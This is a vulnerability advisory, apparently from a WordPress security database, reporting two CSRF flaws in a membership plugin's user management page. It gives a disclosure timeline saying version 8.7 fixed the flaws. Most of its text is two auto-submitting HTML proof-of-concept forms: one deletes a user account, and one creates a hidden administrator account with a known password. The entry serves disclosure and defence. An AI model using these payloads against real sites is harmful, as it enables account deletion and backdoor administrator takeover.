While confirming the issues from https://wpvulndb.com/vulnerabilities/10086 have been remediated, two CSRF issues were identified, allowing attackers to make logged in administrator delete arbitrary accounts, as well as create a new administrator account. Other CSRF may be present but haven't been checked. February 17th, 2020 - Envato Notified February 22nd, 2020 - New version released (8.7), fixing the reported issues, as well as putting CSRF checks on all other actions as per recommendations.
<html> <body onload="document.forms[0].submit();"> <form action="https://examle.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST"> <input type="hidden" name="ihc_limit" value="25" /> <input type="hidden" name="delete_users[]" value="5" /> <input type="hidden" name="delete" value="Delete" /> </form> </body> </html> <html> <!-- Account will not show up in the plugin's users list (because of admin role), but will be in the WP users list --> <body onload="document.forms[0].submit();"> <form action="https://example.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST" enctype="multipart/form-data"> <input type="hidden" name="user_login" value="admin-csrf" /> <input type="hidden" name="user_email" value="[email protected]" /> <input type="hidden" name="first_name" value="Admin" /> <input type="hidden" name="last_name" value="CSRF" /> <input type="hidden" name="pass1" value="Passw0rd" /> <input type="hidden" name="pass2" value="Passw0rd" /> <input type="hidden" name="role" value="administrator" /> <input type="hidden" name="ihc_user_levels" value="-1" /> <input type="hidden" name="ihc_overview_post" value="-1" /> <input type="hidden" name="Submit" value="Register" /> </form> </body> </html>
ErwanLR
Yes
2020-02-24 (about 2 years ago)
2020-02-24 (about 2 years ago)
2020-03-07 (about 2 years ago)